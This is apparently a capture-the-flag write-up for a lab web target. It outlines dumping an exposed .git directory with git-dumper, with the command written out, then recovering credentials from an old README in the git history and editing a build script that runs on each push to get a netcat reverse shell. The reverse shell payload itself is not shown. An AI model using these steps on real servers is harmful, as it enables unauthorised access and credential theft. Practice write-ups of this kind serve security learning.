Extract the repo with git-dumper (https://github.com/arthaud/git-dumper)
Find the credientials in the git history of an old branch
Write to the repo with the extracted creds and get code execution
Complete Writeup
With gobuster, we found that there is a .git directory on the server.
Then we installed git-dumper with pip3 install git-dumper
Then extracted the repo with:
~/.local/bin/git-dumper https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land//website-repo/.git ~/Documents/openecsc/repo_dump
There was nothing too interesting in the files.
With gitkraken we did some further exploration and found an old version of the README.md with had credientials in them:
As the build.sh gets executed on each push, we modified it to get us a nc reverse shell back: